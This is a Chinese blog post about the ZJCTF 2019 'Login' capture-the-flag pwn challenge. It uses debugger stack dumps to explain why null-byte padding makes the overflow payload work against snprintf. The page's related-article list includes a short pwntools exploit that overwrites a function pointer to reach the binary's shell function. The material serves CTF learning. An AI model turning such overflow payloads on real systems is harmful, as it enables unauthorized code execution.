ZJCTF_login

最新推荐文章于 2023-06-10 14:18:52 发布
最新推荐文章于 2023-06-10 14:18:52 发布
阅读量492 收藏
点赞数
分类专栏: pwn题 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Morphy_Amo/article/details/125861799
版权

这道题本身难度不高,具体解题过程可以参考其他师傅的write up。这里主要记录自己做题中的一个疑惑。

构造payload的时候,为什么用‘a’填充就会报错,用‘\x00’填充就没问题?

问题出在

0x400a39    call   snprintf@plt                      <snprintf@plt>

首先看下用a填充的时候

payload = b'2jctf_pa5sw0rd\0'
payload = payload.ljust(0x48, b'a') + p64(0x400e88)

执行snprintf函数之前,栈结构如下,0x7ffe95152a98是我们希望跳转的地址

00:0000│ rsp        0x7ffe95152a30 —▸ 0x7ffe95152ab0 —▸ 0x7ffe95152c00 —▸ 0x400eb0 (__libc_csu_init) ◂— push   r15
01:0008│            0x7ffe95152a38 —▸ 0x7ffe95152b38 ◂— '2jctf_pa5sw0rd'
02:0010│            0x7ffe95152a40 —▸ 0x6021b8 (login+88) ◂— '2jctf_pa5sw0rd'
03:0018│            0x7ffe95152a48 —▸ 0x7ffe95152ad0 —▸ 0x7ffe95152a98 —▸ 0x400e88 (Admin::shell()) ◂— push   rbp
04:0020│ rcx rdi r8 0x7ffe95152a50 ◂— '2jctf_pa5sw0rd'
05:0028│            0x7ffe95152a58 ◂— 0x6100647230777335 /* '5sw0rd' */
06:0030│            0x7ffe95152a60 ◂— 0x6161616161616161 ('aaaaaaaa')
... ↓               6 skipped
0d:0068│            0x7ffe95152a98 —▸ 0x400e88 (Admin::shell()) ◂— push   rbp
0e:0070│            0x7ffe95152aa0 ◂— 0x0
0f:0078│            0x7ffe95152aa8 ◂— 0x8efdc4a1c20f1800
10:0080│ rbp        0x7ffe95152ab0 —▸ 0x7ffe95152c00 —▸ 0x400eb0 (__libc_csu_init) ◂— push   r15
11:0088│            0x7ffe95152ab8 —▸ 0x400bd8 (main+261) ◂— mov    eax, 0

执行后, 因为向0x7ffe95152a98开始的位置传入了50个字符,因此原栈结构被破坏

09:0048│     0x7ffe95152a78 ◂— 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'
... ↓        3 skipped
0d:0068│     0x7ffe95152a98 ◂— 0x61616161616161 /* 'aaaaaaa' */
0e:0070│     0x7ffe95152aa0 ◂— 0x0

snprintf函数遇到\x00时会被截断,因此当我们用\x00去填充的时候,覆盖到sprintf位置的字符串为Password accepted: Password accepted: \n,长度并不足以覆盖我们构造的返回地址,因此此时可以getshell成功。

Morphy_Amo
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
ZJCTF 2019 Login
pondzhang的专栏
05-19 647
from pwn import * p = process('./login') p.sendlineafter("username: ","admin") payload = "2jctf_pa5sw0rd" + '\x00'*58 + p64(0x0000000000400E88) p.sendlineafter("password: ",payload) p.interactive()
buuctf [ZJCTF 2019]Login
carol2358的博客
05-06 1109
先运行,输入admin和2jctf_pa5sw0rd, 发现报错,gdb开始调试 在这里crash了, 去ida里看 ida里自己改名字,原来的看着太乱 反向分析 在read_password里找到var_18 然后通过覆盖var_18, 让他跳到程序自带的shell里 60-18 = 48 e+3a = 48 exp: from pwn import * from LibcSearc...
[ZJCTF 2019]Login--动态调试--详细版
weixin_41748164的博客
11-21 651
全网最详细login的解析,包含静态和动态分析
[ZJCTF 2019]Login的wp
wuyvle的博客
03-05 312
先运行,输入admin和2jctf_pa5sw0rd, 发现报错,gdb开始调试 进入ida看看 在read_password里找到var_18 然后通过覆盖var_18, 让他跳到程序自带的shell里 60-18 = 48 e+3a = 48 exp from pwn import * io = remote('node3.buuoj.cn',28457) shell = 0x400e88 io.sendlineafter(': ','admin') io.sendlineafter('
[ZJCTF 2019]Login
个人笔记
06-10 75
根据输出Nope,猜测程序判断密码是否正确输出,即存在if…,回溯发现a1是参数v8,v8是password_checker(v3);输入正确即调用函数指针,因此找找看有没有。找到了后门函数,我们还需要看看。
LogIn_login_
10-02
Login simple web app
servlet_login_project.rar_开发login servlet
09-20
在本文中,我们将深入探讨如何使用Servlet开发一个登录系统,特别是在标题为“servlet_login_project”的项目中。这个项目提供了一个标准的登录实现,包含了图片验证码功能和MD5加密技术,非常适合初学者进行学习和...
java-Login.zip_login java
09-22
这个名为"java-Login.zip_login java"的压缩包提供了实现Java登录界面的基础代码。下面我们将深入探讨这个主题,了解如何在Eclipse环境中创建一个Java项目并实现登录功能。 首先,让我们分析描述中的关键步骤: 1....
login_登录_login_
10-02
这里我们关注的是一个用PHP实现的登录页面,名为"login.php"。PHP是一种广泛使用的服务器端脚本语言,尤其适用于Web开发,可以与HTML紧密集成,为动态网站提供强大的支持。 首先,让我们深入了解PHP如何处理用户...
Login-system.rar_login_ registration
09-24
基本的登陆系统界面设计,没有注册,仅供学习和测试用,包括登陆,获取密码,修改密码,使用OLEDB连接建立与sql数据库进行数据交互.
ZJCTF_2019_Login
z1r0的博客
12-12 2440
ZJCTF_2019_Login 查看保护 输入正确的密码和用户名,会发生错误,看一下汇编。 在crash之前call 了rax,逆一下找到rax被怎样赋值的。
BUUOJ PWN [ZJCTF 2019]Login
weixin_50287973的博客
11-18 327
输入这些断了下来 是在call rax那断了下来,追踪一下rax [rbp+var_130]的地址作为参数传入User::read_password(void),rax的值赋给了[rbp+var_130] 在password_checker()看看rax怎么来的 这样的话控制[rbp+var_18]为Admin::shell地址就可以了 输入password覆盖到[rbp+var_18] 0x60-0x18=72=14+58 由于_snprintf函数,写入的不含一定0字符的password格式
BUU [ZJCTF 2019]Login
fzucaicai的博客
03-04 842
这是一道让我感觉很淦的题,整一天了才大致了解了来龙去脉。
[BUUCTF]PWN——[ZJCTF 2019]Login
mcmuyanga的博客
11-05 1672
[ZJCTF 2019]Login 附件 步骤: 例行检查,64位程序,开启了canary和nx保护 2. 试运行一下程序 3. 64位ida载入,检索字符串,在程序里找到了用户名admin和密码2jctf_pa5sw0rd 再次尝试登录,无果 在程序里找到了后门函数,backdoor=0x400e88 c++写的程序,看起来有点费劲,自己看了好久都找到漏洞在哪里,后来借鉴了其他师傅的wp后才发现了猫腻 问题出现在检查密码的那个函数上 反编译出来的伪代码看起来没什么问题 但是我们按下tab,
[BUUCTF-pwn]——[ZJCTF 2019]Login
Y_peak的博客
03-11 391
[BUUCTF-pwn]——[ZJCTF 2019]Login 题目地址:https://buuoj.cn/challenges#[ZJCTF%202019]Login 这道题学习还是很多的, 有的时候在源码中跟踪并不一定比在汇编代码中跟踪更快 这里最后一个函数的第一个参数会被当做函数执行,这里我就开始找那个地方可以将这个参数给改了。 v7也就是v3然后找来找去没发现。 不过汇编总是有奇效 这里有一篇博客超级详细, 我也就不在这里赘述了。 点击转跳 ...
ZJCTF 2019 Final 登录系统 WP
fjh1997的博客
10-02 1010
ZJCTF 2019 Final 登录系统 WP 复现 复现地址:http://ctf.fjh1997.top:8000/challenges WP 首先拖进IDA里一看,发现是64位的,再仔细看看,发现没有malloc,那么估计是栈题,也许是ROP利用,checksec走一波。 发现有Canary,估计要想办法绕过,但是找了半天没想到绕过方案遂放弃。 在ida里面继续找找,发现是验证用户密码的...
CTF-PWN-[ZJCTF 2019]Login 栈位置的转换跟踪
serfend's blog
06-23 1368
来源:https://buuoj.cn/challenges内容:附件:链接:https://pan.baidu.com/s/1uBEYYeg9ouPDEOah-BHGQA?pwd=6si8 提取码:6si8答案:PWN题为动态flag使用安装pwn解题框架发现是cpp的题目,在password_checker的第9行下断点到判断密码的位置,随后输入用户名admin,密码cylic(300)用于测试溢出点和调用点题目是比较密码是否等于,正确则跳转进入 发现此处的值是aaaa,则我们将密码设置为 +cylic
2019-ZJCTF
ChenZIDu的博客
12-13 1113
浙江省大学生网络安全竞赛:逆转思路 这题当初没做出来,可惜了。 主要是php序列化,以及data协议。 <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="w...
sichuan_login
最新发布
03-07
sichuan_login是四川大学的统一身份认证系统,用于学生、教职工和校友登录校内各类系统和服务。通过sichuan_login,用户可以使用统一的账号和密码登录四川大学的教务系统、图书馆系统、邮箱系统等各种校内系统,方便...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Morphy_Amo

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值